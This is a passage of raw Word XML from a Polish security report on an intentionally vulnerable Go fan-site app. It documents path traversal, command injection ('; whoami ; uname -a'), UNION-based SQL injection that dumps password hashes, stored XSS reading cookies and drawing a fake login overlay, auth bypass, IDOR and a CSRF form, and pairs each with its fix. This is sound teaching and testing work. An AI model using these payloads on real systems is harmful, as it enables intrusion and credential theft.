      </w:pPr>
      <w:r>
        <w:t>12.4. Łańcuch 4 - Path Traversal + rozpoznanie kodu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../go.mod</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ujawnia nazwę modułu i stos technologiczny.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../internal/db/db.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ujawnia schemat, seedy i przykładowe konta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../app.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> próbuje pobrać rzeczywistą bazę SQLite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vault plików działa jak czytnik plików projektu.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> normalizacja ścieżki i kontrola katalogu blokują wyjście poza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads/</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="35" w:name="sec35"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.5. Łańcuch 5 - Command Injection jako mini-rekonesans systemu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Atakujący wpisuje </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1 ; whoami ; uname -a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 xml:space="preserve">Wynik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> miesza się z wynikiem poleceń systemowych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>W kolejnym kroku można byłoby odczytywać pliki lub zmienne środowiskowe procesu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> input trafia do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, więc metaznaki powłoki są wykonywane.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> walidator odrzuca metaznaki, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.CommandContext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nie używa shella.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="36" w:name="sec36"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.6. 1. SQL Injection w Vocaloid library</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/library</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cel użytkownika:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wyszukanie postów o Miku, utworach, tagach i producentach.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Najpierw sonda logiczna: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' OR EXISTS(SELECT 1 FROM users WHERE username='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admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' AND substr(password_hash,1,1)='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47" w:name="lst47"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 47. Fragment zapytania lub payloadu SQL. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2047"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Następnie właściwa ekstrakcja danych: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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT id, '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user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' || username,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'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role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' || role || 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email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' || email || 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secret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' || password_hash,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1, username, '', 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FROM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48" w:name="lst48"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 48. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2048"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wariant pokazowy "database map":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B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>' UNION SELECT 9000, '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intel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database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map</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>',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'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>users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' || (SELECT COUNT(*) FROM users) ||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tables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' || (SELECT group_concat(name, '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') FROM sqlite_master WHERE type='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table</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>'),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1, '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="BE185D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bot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>', '', 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49" w:name="lst49"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 49. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2049"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metoda wywołania:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>q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z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>z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_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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2050" w:name="lst50"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 50. Payload SQL Injection użyty w wyszukiwarce biblioteki. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2050"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pierwsza sonda działa jak test warunku zależnego od danych w tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Potem zapytanie SQL zmienia strukturę przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. W zwykłych wynikach wyszukiwarki pojawiają się rekordy z tabeli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; tytuł wyniku może zawierać </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[user] admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, a treść email, rolę i wartość </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Osobny payload na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sqlite_master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ujawnia strukturę tabel, payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>database map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buduje podsumowanie bazy, a payload na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>blog WHERE published=0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ujawnia ukryte drafty.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> input jest wartością parametru </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t>, a nie fragmentem składni SQL. Payload jest traktowany jako tekst.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Istota poprawki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> używać parametrów </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i nie doklejać inputu do zapytania.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="37" w:name="sec37"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.7. 2. Stored XSS w komentarzach fan postów</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> komentarze pod wpisami.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script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alert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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>document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cookie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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2051" w:name="lst51"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 51. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2051"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wariant efektowny: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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>img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src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x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onerror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"document.body.insertAdjacentHTML('afterbegin','&lt;div style=&amp;quot;position:fixed;inset:0;z-index:9999;background:#111827;color:white;padding:40px&amp;quot;&gt;&lt;h1&gt;Session expired&lt;/h1&gt;&lt;p&gt;Fake re-login overlay injected from a comment.&lt;/p&gt;&lt;/div&gt;')"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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2052" w:name="lst52"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 52. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2052"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metoda wywołania:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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v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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2053" w:name="lst53"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 53. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2053"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> komentarz jest zapisany i renderowany jako HTML. Przeglądarka wykonuje JavaScript przy wejściu na stronę wpisu; w wariancie overlay cała strona zostaje przykryta fałszywym komunikatem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> komentarz jest escapowany i widoczny jako tekst.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ryzyko praktyczne:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kradzież sesji, wykonanie akcji w imieniu użytkownika, podmiana treści strony.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="38" w:name="sec38"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.8. 3. Broken Authentication w logowaniu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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username=admin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password=anything</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2054" w:name="lst54"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 54. Fragment materiału testowego (text). Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2054"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> istniejący login wystarcza, hasło jest ignorowane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hasło jest porównywane z hashem bcrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Istota poprawki:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> walidować sekret użytkownika, nie tylko istnienie konta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="39" w:name="sec39"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.9. 4. IDOR w kolejce moderacyjnej</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/moderation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metoda wywołania:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2055" w:name="lst55"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 55. Żądanie HTTP odtwarzające scenariusz ataku. Źródło: materiał testowy opracowany na potrzeby weryfikacji.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2055"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scenariusz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> użytkownik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>user1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usuwa post admina, zmieniając ID w żądaniu albo klikając przycisk widoczny przy cudzym poście.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usunięcie przechodzi, bo handler sprawdza tylko logowanie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> handler sprawdza, czy użytkownik jest autorem posta albo administratorem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="40" w:name="sec40"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.10. 5. CSRF w ustawieniach profilu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload PoC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>form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method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"POST"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action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"http://localhost:8080/ui/profile"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>input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name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"new_email"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value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"hacked@evil.com"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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>form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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>document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forms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0E7490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submit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047857"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>script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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:bookmarkStart w:id="2056" w:name="lst56"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 56. Fragment implementacji aplikacji (html). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2056"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> email powiadomień zmienia się, bo przeglądarka automatycznie dołącza cookie sesyjne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ten sam endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wymaga tokena zgodnego z cookie. Trasa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile-secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> została pozostawiona tylko jako alias kompatybilności.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="41" w:name="sec41"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>12.11. 6. Sensitive Data Exposure w member directory</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcja:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/members</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metoda wywołania:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wejście w katalog członków albo odczyt bazy przez SQLi/LFI.  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie vulnerable:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kolumna </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zawiera jawne hasła.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wynik w trybie secure:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kolumna zawiera hashe bcrypt z solą.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
